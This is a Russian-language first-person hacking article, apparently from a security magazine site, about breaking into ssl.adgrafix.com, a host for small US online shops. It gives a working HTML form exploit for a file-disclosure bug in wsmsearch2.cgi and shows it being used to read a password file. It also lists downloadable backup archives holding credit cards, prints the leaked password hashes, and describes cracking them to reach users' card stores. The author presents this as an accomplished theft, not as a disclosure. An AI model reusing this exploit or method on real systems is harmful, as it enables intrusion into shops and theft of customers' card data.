Ресурс ssl.adgrafix.com является хранилищем сотни небольших американских интернет-магазинов.
Пройти мимо такого факта было нельзя. Тем более, что я обнаружил на этом сервере бажный поисковый скрипт
(wsmsearch2.cgi),  позволяющий просматривать любой файл на сервере с правами сервера. О уязвимости подробнее смотреть здесь:
http://www.lwb57.org/advisories/?adv=12

Но моя задача состояла в большем, получить доступ к юзерским хранилицам кредитных карт.
Натравив на сервер DCS с самописной базой, я через некоторое время увидел, что директория /users/ открыта для просмотра,
в ней лежали папки юзеров, естественно требующие авторизации.
Но кроме этого тут же лежало несколько бекап-архивов юзерких папок, оказавшихся доступными для скачивания:

http://ssl.adgrafix.com/users/cedarsinn-secure.tar
http://ssl.adgrafix.com/users/diamonds-secure.tar
http://ssl.adgrafix.com/users/heavymetal-secure.tar
и т.д.

В их содержимом обнаружились кредитки, но самой большой находкой был файл .htaccess следующего содержания: 

AuthUserFile /opt/home2/adgrafix/securedir/heavymetalpw
AuthGroupFile /dev/null
AuthName «Secure Data Retrieval System»
AuthType Basic

<Limit GET POST>

require user heavymetal
</Limit> 

Внимание сразу привлек файл с паролем heavymetalpw, и самое главное тут был прописан путь до него.
Оставалось в exploit добавить этот путь и я получил пароль юзера:

<form method=POST action=»http://ssl.adgrafix.com/cgi-bin/wsmsearch2.cgi»>
<B><FONT FACE=»Arial,Helvetica»><FONT SIZE=-1>Search Site:</FONT></FONT><br></B>
<input type=text name=»terms» size=20>
<input type=hidden name=boolean value=»AND»>
<input type=hidden name=case value=»Insensitive»>
<input type=hidden name=quicksearch value=»NO»>
<input type=hidden name=max value=»50″>
<input type=hidden name=faqfile value=»/»>
<input type=hidden name=resultspage value=»/opt/home2/adgrafix/securedir/heavymetalpw»>
<input type=submit value=»Search!»>

You are calling this script from a domain that is not registered with Adgrafix
Content-type: text/html heavymetal:.vGqzyBep5EDE bcroman:1b8HaV7PCqZc.

Кроме этого у меня уже был список юзеров этого ресурса, полученный с помощью того же скрипта,
в который достаточно было ввести просто имя любого существующего юзера:

http://ssl.adgrafix.com/ssl_adgrafix_user_list.txt

Конечно можно было бы брать логины юзеров из папки /users/,
но раз поисковик был очень добр и выдал мне сразу список логинов, я решил не напрягаться.

Часа через два я уже собрал все логины/пароли и скормил его john’у,
через три дня у меня уже был доступ к половине юзерких хранилищ кред.

Оставить мнение

Check Also

Windows 10 против шифровальщиков. Как устроена защита в обновленной Windows 10

Этой осенью Windows 10 обновилась до версии 1709 с кодовым названием Fall Creators Update …